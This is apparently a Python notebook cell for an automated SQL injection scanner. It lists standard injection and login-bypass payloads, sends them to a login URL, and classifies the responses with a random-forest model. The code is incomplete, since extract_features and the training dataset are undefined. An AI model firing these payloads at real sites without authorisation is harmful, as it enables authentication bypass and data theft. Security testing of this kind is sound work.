In [ ]:
import requests
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
import joblib
from urllib.parse import urlencode

# Define a function to generate SQL injection payloads
def generate_sql_payloads():
    payloads = [
        "' OR 1=1--",
        "' OR 'a'='a",
        '" OR 1=1--',
        '" OR "a"="a',
        "' UNION SELECT null, null, null--",
        "admin' --"
    ]
    return payloads

# Function to send a request and analyze response for vulnerabilities
def send_sql_request(url, payload):
    # Simulating a GET request with payload injected into query params
    response = requests.get(url + "?" + urlencode({"username": payload, "password": "test"}))
    return response.text

# Train an AI model to predict vulnerability based on features
def train_ai_model(dataset):
    X = dataset.drop('label', axis=1)  # Features
    y = dataset['label']  # 1 for vulnerable, 0 for not vulnerable

    # Standardizing the features
    scaler = StandardScaler()
    X_scaled = scaler.fit_transform(X)

    # Splitting data
    X_train, X_test, y_train, y_test = train_test_split(X_scaled, y, test_size=0.2, random_state=42)

    # Random Forest Classifier
    clf = RandomForestClassifier(n_estimators=100, random_state=42)
    clf.fit(X_train, y_train)

    # Saving the model
    joblib.dump(clf, 'sql_injection_model.pkl')
    joblib.dump(scaler, 'sql_injection_scaler.pkl')

    return clf, scaler

# Function to test a website with payloads
def test_sql_injection(url, clf, scaler):
    payloads = generate_sql_payloads()
    results = []

    for payload in payloads:
        response = send_sql_request(url, payload)
        features = extract_features(response)  # This function needs to be implemented based on response analysis
        features_scaled = scaler.transform([features])

        # Predicting vulnerability using AI model
        prediction = clf.predict(features_scaled)
        results.append((payload, prediction))

    return results

# Example: Testing a website for SQL Injection
url = "http://example.com/login"
clf, scaler = train_ai_model(dataset)  # `dataset` is assumed to be a pre-labeled dataset
results = test_sql_injection(url, clf, scaler)

for payload, prediction in results:
    if prediction == 1:
        print(f"Vulnerable to SQL injection with payload: {payload}")
    else:
        print(f"Not vulnerable with payload: {payload}")